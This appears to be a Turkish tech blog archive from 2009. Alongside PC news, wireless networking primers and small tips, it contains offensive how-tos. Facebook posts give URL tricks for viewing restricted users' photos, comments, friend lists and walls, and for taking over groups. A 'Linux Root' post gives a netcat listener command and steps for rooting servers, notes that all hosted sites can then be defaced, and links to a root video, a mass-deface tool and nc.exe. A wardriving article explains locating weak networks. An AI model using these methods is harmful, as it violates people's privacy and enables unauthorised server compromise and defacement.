11 Aralık 2009 Cuma

Dell Optiplex 780 USFF Masaüstü PC

Dell firması yeni kompakt masa üstü bilgisayarı Optiplex 780 USFF 'yi satışa sundu.


Enerji verimliliği açısından ve ilginç tasarımı ile çok yönlü özelliklere sahip olan ürün fiyatı ile de dikkattleri üzerine topluyor.

Teknik Özellikleri:

* Intel Celeron 2,2 GHz,
* 1 GB RAM,
* 160 GB Sabit Disk,
* Intel GMA 4500 grafik kartı,
* Intel 82567LM Ethernet LAN,
* FreeDOS, Linux, Windows işletim sistemleri seçeneği.

Desktop, mini tower ve SFF Box tipinde 3 farklı kasa seçeneği sunan DELL Optiplex 780 USFF'nin fiyatı 329 dolardan başlıyor.

Ürün detayları hakkında daha fazla bilgi almak için tıklayınız.

10 Aralık 2009 Perşembe

Hack'leyen hack'leyene...

Teknoloji ve Uzay dendiğinde akla ilk o geliyor; ama bu hacker'ları durdurmak için yeterli değil!

The Register'ın haberine göre; geçtiğimiz hafta sonu, güvenlik açıklarını kullanan bilgisayar korsanları, Amerikan uzay çalışmaları kurumu NASA'ya bağlı iki internet sitesine saldırdı düzenledi.

Bu kez hacker'ların hedefi, 'Cihaz Sistemleri ve Teknolojisi' ile 'Yazılım Mühendisliği' departmanları oldu. Zayıf erişim kontrolleri ve SQL hatalarından faydalandıkları bildirilen saldırganların, denetimini ele geçirdikleri sayfaların ekran görüntülerini, e-posta aracılığıyla dağııtkları bildirildi.

NASA'nın Johnson Space Centre sitesi, daha önce İngiliz hacker Gary McKinnon tarafından hack'lenmişti. Verdiği ifadede UFO'larla ilgili bulguları araştırdığını belirten McKinnon'ın Amerikan mahkemeleriyle olan davası halen askıda.

9 Aralık 2009 Çarşamba

Facebook Hack

Sosyalleşelim derken işin suyunu çıkardığımız platform olan Facebook, açıklarına gün bir yenisini eklemeye devam ediyor. Daha önce kişinin albüm fotoğraflarından birinin kalıcı bağlantısına ulaştığımızda Batch Download tekniğiyle kişinin diğer fotoğraflarına da, genele açık olmasa bile ulaşabilmek mümkündü. Neyse ki bu büyük açığı kapattı Facebook ve eski 4 haneli resim kodunun önüne 6-8 haneli random bir güvenlik kodu daha ekledi. Böylece Batch Download tekniğiyle kişinin fotoğraflarını çalma furyası da son buldu. Ancak halen Facebook’da bir takım açıklar mevcut. Anlatacağım açık sayesinde kişinin profil resminin en büyük haline ulaşmak mümkün oluyor.

Eğer Facebook aramasında kişinin profil fotoğrafının küçük halini görebiliyorsanız küçük bir hile ile fotoğrafın büyüğünü de görme şansınız oluyor. Örnek olarak aşağıdaki profil fotoğrafını ele alalım:

http://profile.ak.facebook.com/profile5/1482/47/s1027405825_5905.jpg

Buradaki “s” harfi “small” yani küçük fotoğrafı temsil ediyor. Eğer bu “s” harfi yerine “normal” anlamına gelen “n” harfini eklerseniz, söz konusu fotoğrafın büyük boyutlu olanına da ulaşabiliyorsunuz. Şu şekilde:

http://profile.ak.facebook.com/profile5/1482/47/n1027405825_5905.jpg

Facebook Açıkları

Ne kadar gizlesenizde özel bilgileriniz, Facebook’ta tamamıyla açık.Birkaç basit yöntemle tüm sakladığınız herşey gün ışığına çıkıyor.

Facebook’taki açıkları daha iyi anlayabilmek için öncelikle 2 kavramı bilmemiz gerekir.Bunlar id ve network’tür.

Id siteye üye olan her kullanıcıya verilen sıra numarasıdır.İkinci kavram network sizin bulunduğunuz ülke veya okuduğunuz okul için özelleşmiş gruplardır.Network bir tür ortak nokta olduğu için Facebook bazı özellikleri kişinin bağlı olduğu network’teki üyelerin görebileceği şekilde kodluyor.

Photo Comment(Yorum Açığı)

Bir kodlama açığıdır.Kişi bağlı bulunduğu network’e açıksa yada hiçbir network’e üye değilse kişinin fotoraflarına yapılan yorumları ve fotoraflarını görebilirsiniz.aynı anda binlerce network’e bağlı gözükebilirsiniz.Açığın kullanımı

http://www.facebook.com/photo_comments.php?id=kişininidnumarası

View Friends Açığı(Arkadaş listesi açığı)

Arama sonuçlarında gördüğümüz gibi bazı kullanıcılar view friends özelliğini kısıtlamış durumda ve arkadaş listesini göremiyoruz.Yukarda anlattığım photo comment açığı ile kişinin herhangi bir resmini tıklıyoruz.Resim açıldıktan sonra "Tag this photo" diyerek resmin üzerinde bir yere tıklıyoruz.Karşımıza küçük bir kutu açılıyo ve kişinin arkadaş listesi yükleniyor.Bu şeilde arkadaş listesine ulaşabiliyoruz.

Super wall açığı

Eğer kişi profilini gizlemişse ve arkadaşlarını görmemzi de engelliyorsa sıradan bir kullanıcı için kişi hakkında tek ulaşabileceği bilgi Facebook’a üyeliği ve eğer eklemişse kişisel resmidir.Bu kısıtlı durum super wall ile aşılabiliyor.BU açık ile kişi tüm güvenlik ayarlarını maksimum tutsa bile girebiliyoruz.

http://apps.facebook.com/superwall/view.php?id=kişininsıranumarası

Artık kişiye gelen mesajları görebilir.Kişinin fikri yapısı ve hayat görüşü gibi önemli bilgilere ulaşabilirsiniz.

Fun Wall Açığı

Fun wall da super wall’a benzeri uygulama.Farkı bu uygulamada daha çok mizahi videoların bulunması.Bu açık sayesinde kişinin kullanıcı ve hangi videoları kabul edip etmediğini görebiliyoruz.

http://apps.facebook.com/crazyfunpix/?view=kişininsıranumarası

şeklinde kullanıyor.Bu sayede kişinin fun wall’ına bağlanabiliyor bilgilere girebiliyoruz.

Facebook Bug’ları

Facebook dünyanın en çok tıklanan sitelerinden biri olmasına rağmen yinede bazı programlama hatalarına sahip.Aktivasyon yapmayan üyelerin bilgilerinin de tamamen saklanmasına rağmen bir kod hatası ile sisteme girebiliyor ve kişinin ismini görebiliyoruz.örneğin kişi 123 numarası ile aktivasyon yapmamış o zaman

http://www.facebook.com/profile.php?id=123

tıklayın ve bizi doğrudan anasayfaya atıyor ve bilgi vermiyor fakat

http://www.facebook.com/album.php?aid=3&id=123 yaptığımız taktirde içerik bulunamadı diye hata veriyor.Ama alttaki satırlardan biri "View 123(kişinin adı)" şeklindedir.Bu hesabın kime ait olduğunu bulabiliyoruz.

Karışık şifreleme değil base64

Birisi size mesaj yollayınca facebook’ta kayıtla epostanıza bir uyarı geliyor.

örneğin Serhat Güvercin adlı arkadaşınızın yolladığı bir mesajun karşısında "Want to ontrol which emails you receive from facebook? Go to :"

http://www.facebook.com/editaccount.php?notifiations&md=bXNnO2Zyb209Njc3MDQyNDExO3Q9MjUxNTEwMTAxODU=

kısayolu çıkıyor.ilk bakışta karmaşık gibi gözüksede ama sadece bu base64 şifreleme biçimi.Burada md= ’ten sonraki kısım karmaşık yapıyı alır herhangi bir base64 encoder yardımı ile çözdüğünüzde msg;from=677042411;t=25151010185"olduğunu görebiliriz.Size önerim Cw’nin yapmış olduğu CW-Cryptic’i kullanmanızdır.Mesajı kim yollamış Facebook’ta kaçıncı sırada yollanan mesaj anlayabiliriz.Hatta belli aralıklar ile bu mesaj saısındaki mesaj trafiğini inceleyebiliriz.

Linux Root | Video

Linux serverlarda root olmayı yani serverdaki en yetkili kişi olmayı gösterdim arkadaşlar.

Servere verilebilecek zarar : Tüm siteler deface edilebilir vs ..

Kullanılan komutlar :
ls -la : listeleme
cd : dizin değiştirme
chmod : permisyon değiştirme
Bağlanma komutu : nc -vv -l -p 443
./exploit : Exploit çalıştırma

NOT : Servera bağlanmak için safe modun off olması gerekir aksi takdirde bağlanma olmaz.

Root için yapılması gerekenler :
1-)modemde port açma (herhangi bir port)
2-)nc (windows klasörne atmak) bağlantıyı sağlamak için
3-)ve linuxa ait uygun exploiti bulmak
4-)sonra bu videoyu izlemek

Linux Root video :
http://rapidshare.com/files/238660501/root.rar.html
Alternatif :
http://www.zshare.net/download/606891532bd445bf

Toplu Deface :
http://rapidshare.com/files/238660816/toplu_deface.rar.html
Alternatif :
http://www.zshare.net/download/60689190bdd9972a/

nc.exe :
http://www.zshare.net/download/60689616b1b8a985/

Facebook Gruplarında Yönetici Açığı...

Facebook Biliyorsunuz ki Hayatımıza Çok Hızlı Birşekilde Girdi Birçogunuz Merak Ediyorsunuzdur. Herhangi Bir Grubun Yöneticisi Silindigi Zaman Nasıl Oluyorda Hemen Farkedip Grubu Alıyorlar =)

İşte Size Bundan Bahsedecegim

Facebook Bir Başka Programlama Hatası İle Google Kayıtlarına Göre 127.000 Gruba Yönetici Olabilmenize Olanak Tanıyor. Tek Yapmanız Gereken Google’da "There are no admins left in this group!" Sorgusu İle Arama Yapmak. Çıkan Grupların Bir Çoğunun Yöneticiliği Boş Durumda. Gruba Üye Olduktan Sonra Yönetici Olabiliyorsunuz.

Acronym ve Abbr Kullanımları

1: Acronym etiketi

Bir kelime hakkında, mouse ile üzerine gidildiğinde açıklama/ipucu göstermeye yarar.

SEO uzmanlık gerektirir.

Sitede sık kullanılan kelime ya da kelime grupları için nispeten ayrıntılı bilgi vermeyi sağlayan Acronym etiketi, o kelime hakkında bilgi verdiğinden Google tarafından sevilmekte.

2: Abbr etiketi

Abbreviation (Latince:Kısa) kelimesinden türetilen etiket.

Bu etiket, kısaltılmış kelimeler için kullanılır.

Kullanımı:

Prof Emre Çolak.

Kablosuz Aglarda Tarama Wardriving-WarChalking

Daha önceki yazımızda kablosuz ağlarla ilgili bir giriş yapmış, protokolleri ve IEEE nin standartlarını incelemiştik. Kablosuz ağların kırılabilmesi ve içeri sızabilmek için öncelikle saldırganın açık ağları keşfetmesi gerekmektedir. Bu yazı bunun için bilinen metodları ve bunlara karşı nasıl önlem alınacağını anlatacaktır.
Kablosuz ağlarda tarama nedir?

Kablosuz tarama, kablosuz ağdaki uygun AP lerin bulunabilmesi metodudur. Kablosuz ağ kartının promiscuous modda (her paketi kabul eden mod) çalışması ve yazılımınızın iletişime açık AP leri tespit etmesi ile kablosuz ağların tanımlanmasıdır. Bir kere ulaşılabilir bir AP bulduktan sonra, Wardriver onu kullanılabilir klasör olarak tanımlar. Bundan sonra saldırgan o AP in gerekli bütün bilgilerine ulaşabilir(SSID, WEP, MAC vs.) Saldırgan ağa girmek isterse, bütün paketleri daha sonra incelenmek üzere loglar veya WEP ahantar kırıcısını çalıştırarak zayıf anahtar kullanılıyorsa bunu ele geçirir.

Kablosuz ağı taramak için birkaç değişik yol vardır. En çok bilinen ve kullanılan method Wardriving ve sonra da Warchalking dir. Warstrolling, Warflying gibi başka methodlarda vardır. Bu yazıda sadece Wardriving ve Warchalking den bahsedeceğiz.

Niçin "War" ? (Niçin "Savaş" ?)

Wardriving ve Warchalking iinde kullanılan "war" kelimesi aslında eski zamanlarda kullanılan Wardialing den gelmektedir. Wardialing, saldırı amacıyla kullanmak üzere bir telefon numarasının bütün ihtimallerini deneyerek modem takılı olan hattı bulmak olarak tanımlanabilir. Bu yazıda kullanılan Wardriving de kablosuz ağlar için aynı mantıkta kullanılmaktadır.


WarDriving

Wardriving, ilk ve en çok bilinen kablosuz ağ tespit etme (tabii ki güvenliği olmayan yada az olan) metodudur. Genellikle bir gezici birim ile mesela dizüstü veya el bilgisayarları ile kullanılır. Wardriving taraması son derece ustalıkla ve çok basit yollarla gerçekleşir: Saldırgan dizüstü veya el bilgisayarı ile arabasında otururken bir kablosuz ağ tespit edebilir(NetStumbler for Windows, BSD-AirTools for BSD veya AirSnort for Linux) Bir kere uygun bir AP tespit edildikten sonra saldırgan bunu kullanılabilir klasör olarak tanımlar ve araştırabilir. Ve hatta internete ulaşmasını engelleyebilir.

Wardrive için gerekli olan ekipman: Kablosuz ağ kartı (PCMCIA), kendinizi harita üzerinde tespit edebilmek için GPS (Global Position System - Global yer tespit sistemi) -bu aslında çok da gerekli bir araç değildir- , dizüstü veya başka tür bir gezici bilgisayar, Linux red Hat veya Debian işletim sistemi (Windows pek tavsiye edilmemektedir), kablosuz iletişim yazılımları (WEPCrack, AirSnort vs..)

Yukarıda sayılan ekipmanlar kolaylıkla bulunabilir ve çok ucuzdur.


WarChalking

" Ve yeni bir dil gelişiyor: WarChalking. Bu fikir "hobo sembolleri - hobo symbols" temeline dayalıdır ve caddedeki semboller orada açık bir kablosuz ağ olduğunu ve ayarlarını anlatır. Anlaşılması güç ve kargacık burgacık gibi gözükmekte ve birçok insan bunun eski grafiti yazılarına benzediğini düşünerek aldırmadan yürüyüp geçmektedir fakat saldırganların anlayabileceği birçok bilgi içerirler" - Zig
Kaynak: Wardom http://www.wardom.org/showthread.php?t=23577

WarChalking bi grup arkadaş tarafından 2002 haziranında tasarlandı ve Matt Jones tarafından yayınlandı.

WarChalking basitçe, yol kenarlarına veya duvarlara tebeşir ile orada bir kablosuz ağın olduğunu gösteren semboldür, böylece diğerleri kolayca bu ve diğer detayları not edebilmekte idi. WarChalking, yolların düşük teknoloji krallarının birbilerini barınak, yemek ve potansiyel tehlikelere karşı korumak için kullandıkları hobo işeret dilinin modern uyarlamasıdır. Bu tebeşir işaretleri, kablosuz ağlar hakkında görsel bir işaretten başka birşey vermez.

Aşağıdakiler WarChalking sembolleridir:

Symbol Key

SSID Open Node
)(
Bandwidth

SSID Closed Node
Kaynak: Wardom http://www.wardom.org/showthread.php?t=23577
()

WEP Node SSID Access Contact
( W )
Bandwidth

WarChalking�e bir örnek:

Retina
)(
1.5

Bu sembolün manası; Burada SSID �Retina� olan ve bant genişliği 1.5 Mbps olan bir istasyon olduğudur.

Bu sembolleri kullanmakla, WarDrivers için gerekli olan istasyona ve ağa ait birçok bilgi alınmış oluyor. WarChalking'i anlamanın yollarını bilen biri, ağada rahatlıkla online olabilir.


WLAN ları güvenli hale getirmek

Kablosuz ağları güvenli hale getirmek kablolu ağlara göre çok daha basittir. Güvenli bir kablosuz ağ yaratabilmek için birkaç işlem yeterliş olacaktır. Bunun yanında kendinize "Neden o zaman kablosuz ağları kırmak bu kadar kolay?" diye sorabilirsiniz. Cevabı çok basit. Bir şirket ne zaman bir kullanıcısına kablosuz olarak bağlanmak istese, sistem sorumluları sıklıkla router, ateş duvarı, AP, WEP i açma ve diğer birçok şeyin başlangıç değerlerini değiştirmeyi unutmaktadır. Başlangıç değerleri değiştirilmediği için de bu ağ artık saldırılara açık hale gelmektedir.

Bunun yanında, sistem sorumlularının birçoğu, kablosuz ağların, binanın duvarlarının dışına kadar gittiğini unutmaktadır. Kapıda güvenlik memuru olabilir, ve kablolu ağlar için en iyi ateş duvarlarına sahip olabilirsiniz fakat kablosuz ağlar için arka kapı sonuna kadar açıktır.

Kablosuz ağları güvenli hale getirmek için neler yapılabileceğini bu yazıda anlatmayacağız. Bundan sonraki yazımızda bu konuda olacaktır.

Msn De Klavye Sapmasına Son!

Birçok Kişinin Başına Gelmiştir. Klavye Tuşlarına Bastığınızda Farklı Karekterde Yazılar Çıkar. Bunu Önlemek İçin aşağıdaki Adımları Takip Etmeniz Yeterli.

Denetim Masası / Bölge Ve Dil Seçenekleri / Diller / Ayrıntılar

Yüklü Hizmetlerde Sadece Tükçe Kalacak Şekilde diğerlerini Kaldırın.



Artık Böyle Bir Sorunla Karşılaşmazsınız.

Kablosuz Ağlar Bölüm 2

Her kablosuz ağ radyo vericisi ve anten gerektirmektedir. Kablosuz ağ bileşenleri istasyonlar (STA - Stations) veya bağlantı noktaları (AP - Access Point) olarak bilinirler. Temel servis seti (BBS - Basic Service Set) biçimlendirilmişken, 2 veya daha fazla istasyon birbirleri ile ve ağ ile iletişim kurarlar. Genişletilmiş servis seti biçimlendirilmişken, BBS ler (herbiri bir AP içerir) birbirine bağlanmıştır.

Standart kablosuz ağlar(802.11) şu 2 moddan biri ile çalışırlar :
Kaynak: Wardom http://www.wardom.org/showthread.php?t=23561
* ad-hoc (peer-to-peer / makinadan makinaya)
* infrastructure (altyapı)

ad-hoc modu BBS bağımsız olarak tanımlanabilir. Infrastructure modu ise BBS gibidir.

ad-hoc modunda, her kullanıcı ağdaki bir diğeri ile direkt iletişim kurar. Bu mod, birbirleri ile iletişim mesafesinde olan kullanıcılar için tasarlanmıştır. Eğer bir kullanıcı bu tanımlanmış mesafeden dışarıya çıkarak iletişim kurmak isterse, arada bir kullanıcı ağ geçidi ve yönlendirici olarak görev yapmak zorundadır.

Infrastructure modunda ise, her istasyon bağlantı isteklerini bağlantı merkezi olarak bilinen (AP - Access Point) merkez istasyona yollar. AP ler bildiğimiz kablolu ağ anahtarları gibi çalışır ve iletişimi kablolu veya diğer bir kablosuz ağa yönlendirir. AP ler ve istasyonlar veri iletişimine başlamadan önce iletişim sağlamalıdırlar. Sadece ve sadece iletişim sağlandıktan sonra veri alış verişi başlar. İletişim kurulması 3 durum içerir:

- Doğrulanmamış ve ilişkilendirilmemiş
- Doğrulanmış ve ilişkilendirilmemiş
- Doğrulanmış ve ilişkilendirilmiş

Durumlar arası geçiş, yönetim çerçeveleri (Management Frames) olarak adlandırılan iletişim alış veriş mesajları ile gerçekleşir. AP ler belli aralıklarla işaret yönetim çerçeveleri yollamak üzere tasarlanmışlardır. AP ile iletişim kurmak ve BBS e girebilmek için, istasyon bu işaret yönetim çerçevelerini dinler ve AP in iletişim mesafesinde olup olmadığını anlar. İstasyon bu işaret çerçevesini (mesajını) aldığı zaman hangi BBS e dahil olacağını seçer. Bütün ağ isimlerini ve servis seti tanımlayıcılarını (SSID - Service Set Identifiers) içerir bu işaret çerçeveleri. Fakat Apple Macintosh larda kullanıcı dahil olmak istediği SSID yi kendisi seçmek zorundadır.
İstasyon istenen SSID ile iletişimde olduğu AP ye araştırma istek çerçevesini yollar. İstasyon AP yi tanımladıktan sonra birbirlerine kimlik denetimi için birkaç yönetim çerçevesi yollarlar. Halen 2 standart kimlik tanımlama mekanizması varır : Açık anahtar kimlik tanımlaması ve Ortak anahtar kimlik tanımlaması (Open Key Authentication ve the Shared Key Authentication). Genellikle kablosuz ağlar birinci mekanizmayı kullanırlar ve bu başlangıç değeri olarak tanımlanmıştır (Güvenlikten yoksun kalınmaması için).
Eğer kimlik tanımlaması sorunsuz giderse, istasyon ikinci adıma geçer: Doğrulanmış ve ilişkilendirilmemiş (authenticated and unassociated). İstasyon ilişkilendirilme istek çerçevesini yollar ve AP buna cevap verir. Eğer herşey yolunda giderse istasyon son ve 3. adıma geçer: Doğrulanmış ve ilişkilendirilmiş (authenticated and associated). İstasyon artık ağda bir kullanıcıdır ve veri transferine başlayabilir.

Kablosuz Ağ Tipleri

BlueTooth

Bluetooth henüz çok fazla yaygın bir kullanıma sahip değil ve bilgisayarlar arasında yüksek hızlı veri transferinde yer alması beklenmiyor. Bu teknoloji hakkında daha geniş bilgiyi şu linkte bulabilirsiniz:
http://www.howstuffworks.com/bluetooth.htm

IrDA

IrDA, kızıl ötesi direkt ulaşım olarak karşımıza çıkıyor ve iletişimde kızılötesi ışın vurumları kullanan cihazlar için standarttır. IrDA aygıtlar kızılötesi ışınlar kulladığından beri diğeri ile iletişim kurabilmek için aralarında direkt bir görüş açısı bulunmak zorundadır. IrDA kullanan kablosuz ağlar veri taransferi için en fazla 4 Mpbs kullanabilmektedir, fakat direkt bir görüş açısı olması gerektiği için her odada bir AP gerektirmektedir.

HomeRF

HomeRf ler ortak kablosuz iletişim protokolüne (SWAP - Shared Wireless Access Protocol) göre geliştirilmişlerdir. Temel olarak SWAP aygıtları, saniyede 50 atlama noktası (HPS - hops per second) ve 1 Mbps hızında olup bazen 2 Mbps hızında çalışabilmektedirler.
AP, kablo gerektirmezler, 120 aygıta kadar destekleyebilirler (her ne kadar ev kullanıcıları için fazla olsada), veriyi şifreli olarak iletebilirler ve daha birçok özellikleri vardır. Belki hiçbir dezavantajı olmayan bir ağ olarak düşünebilirsiniz, fakat ne yazık ki var. Yukarıda bahsedildiği gibi, veri transfer hızı 1 Mbps dir, menzili ise 23 ile 38 mt arasındadır, hazli hazırda var olan kablolu ağa katmak ise oldukça güçtür ve daha fazlası.

Birçok durumda, SWAP tabanlı ağlar ad-hoc modunu kullanırlar, fakat hala bazı üreticiler kablosuz ağların menzillerini arttırmak için AP önerirler. Ev kullanıcıları için kablolu kişisel ağ veya geleneksel ağ kartı ile HomeRF e göre 10 belki 100 kat daha hızlı çalışmak daha iyi olacaktır. Yine de evdeki ağınızda video kullanmayı veya oyun oynamayı düşünmüyorsanız, SWAP hızı sizin için yeterli olacaktır.

WECA (Wi-Fi)

Wi-Fi kablosuz ağlar, HomeRF e göre tamamen farklı bir yönde gitmektedir. Wi-Fi ağlar ev kullanıcılarından çok ofis kullanıcılarını hedeflemektedir. Wi-Fi nin IEEE de karşılığı 802.11b dir ve kanlosuz bağlılık (Wireless Fidelity) olarak karşımıza çıkmaktadır. Bu özellik, yüksek veri transfer hızına ulaştığı için DSSS üzerine yoğunlaşmasına sebep olmaktadır. Wi-Fi aygıtlar, eğer mümkünse 11 Mbps hızına ulaşmaktadır. Eğer sinyalde zayıflama veya veri bozulması yaşanırsa aygıt otomatik olarak 5.5 Mbps veya 2 Mbps ve son olarak 1 Mbps hızlarına düşmektedir. Arada sırada bu tür yavaşlamalar ağınızı daha kararlı ve çok güvenilir kılacaktır.

Bazı Wi-Fi avantajları:

- Çok hızlı ve 11 Mbps hızına çıkabilmekte
(Çevirmen notu : Daha öncede belirttiğim gibi Wi-Fi5 standartına göre 54 Mbps hızıda mümkün. Bu Wi-Fi teknolojisini daha seçilebilir yapmıyor mu?)
- Kararlı ağ oluşturur
- Yüksek menzile sahip (305 mt açık alanda, 122mt kapalı alanda)
(Çevirmen notu : Kullandığınız cihaza göre bu değişebilmekte. Bu mesafeyi etkileyen diğer etkenler ise kullandığınız antenler ve binanızın yapısal özellikleridir. Mesela çelik bir konstrüksiyon ile beton atasında hatta tuğla bir bina yapısı içinde çalışmak arasında çok fark olacaktır. Fakat genelde gördüğüm mesafeler şu şekildedir : Açık alanda en fazla 30 km. , kapalı alanda ise en az 50mt)
- Bütün DSSS 802.11 aygıtları desteklemektedir

Wi-Fi hala en iyi çzöüm gibi gözüksede, onun da dezavantajları var:

- Pahalı (300$ ile 1400$ arası değişmektedir)
(Çevirmen notu : Bu rakamlar amerika rakamları olsa gerek tecrübelerime göre :
En basit bir AP ile sadece bir çalışma grubu (Workgroup) oluşturmak isteseniz size maliyeti 300 ile 700 dolar arası değişiyor. Fakat binalar arası bir sistem kumayı planlıyor iseniz o zaman 3000 dolar civarında olacaktır. Tabii 54 Mbps sistem kurmak daha da maliyetli olacaktır. Bu arada hiçbirinde istasyon için alınacak kablosuz ağ kartını hesaplamadık)
- AP gerektirmektedir
- Kurması zor olabilir

Kablosuz Ağlar Bölüm 1

IEEE Standartları ve Kablosuz Ağlar:

Kablosuz ağlara girmeden önce IEEE nin kablosuz ağlar hakkındaki standartalrını anlamak çok önemlidir.

IEEE (The Institute of Electrical and Electronics Engineers) 802.X adı altında; Yerel ağlar (LAN - Local Area Networks), Metropol ağlar (MAN - Metropolitan Area Networks) ve BlueTooth gibi Kişisel ağlar (PAN - Personel Area Networks) için standartlar çıkartmıştır. IEEE nin 802 si, OSI'nin son 2 katmanı olan Ortam Ulaşım Kontrol (MAC - Media Access Control) veya Bağlantı Katmanı (Link Layer) ve Fiziksel Katman (Physical Layer) daki süreç standartlarını ve işlemleri sınırlandırmıştır.

IEEE 802 LAN/MAN/PAN standartları komitesi kendi içinde 802.1 den 802.17 ye kadar çalışma gruplarına ayrılmıştır. Böyle ufak çalışma gruplarına ayrılmalarının yararı, her grubun kendi farklı konularını ve geliştirme standartlarını sağlamalarıdır.

Bu tanım içindeki en önemli çalışma grupları şunlardır :

- 802.1 - Güvenlik ve diğer konular
- 802.2 - Mantıksal Bağlantı Kontrolleri (LLC - Logical Link Control)
- 802.11 - WLAN'lar için standartlar üretmek (Kablosuz lokal ağlar)
- 802.15 - WPAN'lar için standartlar üretmek (Kablosuz kişisel ağlar)

802.1 ve 802.2, kablosuz lokal ağlar için uygulanmaktadır. Her çalışma grubu kendi içinde görev gruplarına ayrılmışlardır. Bu görev grupları çeşitli ihtiyaçların sağlanması ve standartların geliştirilmesi üzerine çalışmaktadır.

Kablosuz ağlar kurmak için şu anda kullanılan ana standart IEEE 802.11 dir. IEEE 802.11 ilk olarak 1999 da yayınlanmıştır ve 2.4 Ghz de 2Mbps (DSL bağlantı gibi) hızında veri iletişimi için tasarlanmıştır. Ayrıca Frequency Hopping Spread Spectrum (FHSS) veya Direct Sequence Spread Spectrum (DSSS) kullanılmak üzere tasarlanmıştır.
Kaynak: Wardom http://www.wardom.org/showthread.php?t=23561

DSSS in anlamı; belirlenmiş menzil içinde herhangi bir zamanda kullanılmak üzere, verinin uygun değişik frekanslarda küçük paketler halinde yollanılmasıdır.

FHSS de ise; veri, değişik frekanslarda kısa ama iri paketler şeklinde tekrarlanan bir biçimde yollanır. FHSS ağlar, diğerleri ile karışmayan aynı fiziksel alanlar için vardır.

Bugün, "a" dan "i" ye kadar sınıflandırılan görev grupları değişik metodlar ve 802.11 standartının geliştirilmesi için çalışmaktadır. WLAN lar için 802.11b standardı gelmektedir(Wi-Fi). Bu standart DSSS kullanmaktadır ve 2.4 Ghz de, 11Mbps (DSL den yüksek bir hızdır) e kadar veri hızına çıkılmaktadır. Tabii ki bu standart sonsuza dek WLAN lar için tek standart olmayacaktır. Fakat daha yüksek hız, güvenlik ve daha iyi kalite için tercih edilecektir.

Aynı evrim kablosuz ağ dünyasından tamamen çıkmakta olan kablolu ağ kartları için de gerçekleşmiştir. Bugünkü kablosuz ağ standart hızı 11 Mbps dir, fakat yakın bir gelecekte daha yüksek hızlara ulaşması mümkündür. Kablosuz ağlarda daha yüksek veri hızlarına çıkmak için 2 seçenek vardır. Birincisi zaten bulunmuş ve geliştirilmiştir. Diğer ise henüz geliştirilme aşamasındadır.
(Çevirmen Notu: Yazarın bu yazıyı yazdığı tarih aslında çok eski değil. 7 ay kadar önce yazılmış bir yazı. Fakat düzeltilmesi gereken bir nokta var ki; artık aynı görev grubu 802.11a standardı üzerine çalışmakta olup 5Ghz de 54 Mbps hızlara ulaşan WLAN ağ cihazlarını bulabilmek mümkündür)

Kablosuz ağlar için, 802.11b standardı içinde 3 adet daha standart geliştirilmiştir :

802.11a - 802.11a standardı 1999 da yayınlanmış olup, OFDM (Orthogonal Frequency Division Multiplexing) kullanmakta ve 5 Ghz de 54 Mbps hızına çıkabilmektedir. Bu standart ile ilgili problem 5 Ghz lik yayının duvar ve diğer objelerden geçerken daha fazla yol kaybna uğramasıdır. Bu problemi gidermenin yolu, dhaa fazla veri hızı için daha fazla ulaşım noktası(AP - Access Point) kullanılmasıdır.

802.11g - 802-11g standardı 2.4 Ghz de (aynı 802.11b Wi-Fi gibi) ve 22 Mbps hızında OFDM kullanmaktadır. 802.11a ile karşılaştırıldığında daha az yol kaybı ve daha ucuz olması gösterilebilir.

802.11e - Eğer servis kalitesine bakıyorsanız (QoS - Quality of Service) doğru standarttır. 802.11e, bugünkü 802.11 standardını geliştirmek ve servis kalitesi arayan uygulamalara desteğini genişletmek üzere çalışmaktadır. Kablosuz ağlar hem ev hemde iş alanları için uygundur. Her ikiside çoklu ortam (Multimedia) desteği istemektedir (özellikle evlerde). 802.11e buna çare bulmaya çalışmaktadır. Hem kablolu hemde kablosuz ağlarda, veri transferi, bağlantının kesilmesi veya paketlerin tekrar yollanmasının sekteye uğraması ile direkt bağlantılıdır (Birçoğumuzun başına bu birkaç kez gelmiştir sanırım). Bu kesilmeler düzenli veri akışını isteyen durumlarda problem yaratır. 802.11e, zamana hassas uygulamaların daha rahat kullanılabilmesi için kaliteli servis temel dokümanını oluşturmaktadır.

IEEE nin kablosuz ağlar standartları ile ilgili bu kısa girişten sonra şimdi bu yazının asıl kısmına gelelim: Kablosuz Ağlar. Şu ana kadar kullanılan bazı terimler Kablusuz ağlara ait sözlükten alınmış olup ilerleyen bölümlerde daha detaylı inceleyeceğiz.


Kablosuz Ağ

Giriş
Internet teknolojisinin son birkaç yılı şaşırtıcı ve çok uzun adımlarla ilerlemiştir. Sadece birkaç yıl önce 56Kbps modemleri kullanırken şimdi insanlar şirketlerinin sahip olduğu T1 (2 Mbps) bağlantıyı evlerindeki 6 Mbps bağlantı ile karşılaştırıp beğenmiyorlar.

Daha önce bilgiye bedava ve hızlı ulaşım bu seviyede değildi. Internet bağlantı hızları geliştikçe ve insanlar megabit lerce dosya indirme hızına ulaştıkça daha fazla bilgiye aç olacaklar gibi gözüküyor. En çok kullanılan ve tercih edilen servis türü DSL (Digital Subscriber Line) olmaktadır. DSL bant genişliği olarak 384 Kbps den 6 Mbps e kadar olup, herkezin sahip olduğu standart telefon hatları üzerinden ulaşım sağlamaktadır. Bu servis çok ucuz olmayıp aylık 50$ ile 300$ arası ücretlere sahiptir ve ISP ekipmanı gerektirmektedir. Sorulan soru şudur: "Bir şirketin yüksek internet hızlarına sahip olması mı yoksa dolaşıma izin veren ağ ekipmanına sahip olması mı?"

Bu sorunun cevabı WLAN dır. WLAN serbest dolaşıma izin veren ağ ekipmanı üretmektedir. Aynı zamanda ucuz ve yüksek bant genişliği servisinide sağlamaktadır. Kablolu bir ağ tasarlamak için ortaya çıkan maliyet ile kablosuz ağ tasarlandığında arada çok fazla bir fark olmadığı görülecektir. İş dünyasında kablosuz bağlantı, daha fazla dolaşılabilirlik ve internete her zaman bağlı kalabilme gibi özellikler getirmektedir.

Bugünlerde 4 tip kablosuz ağ vardır. Bunlar ucuz ve yavaş olandan, pahalı ve hızlı olana doğru sıralanırsa:

- BlueTooth
- IrDA
- HomeRF
- WECA (Wi-Fi)

Bu ağ tipleri ilerleyen kısımlarda açıklanacaktır.

WECA, kablosuz ağ kartları uyumluluk ittifakı için kullanılmaktadır ve 802.11 ürünlerine sertifika vermektedir. İlk jenerasyon ürünler WECA tarafından sertifikalanmış ve 802.11b temeline göredir. Bütün ürünler Wi-Fi logoso ile damgalanmış olup, Wi-Fi olarak bilinirler. Sonraki jenerasyon ise 802.11a ürünleridir ve bunlar da Wi-Fi5 logosu ile damgalanmışlardır.

ASP SQL Enjeksiyon

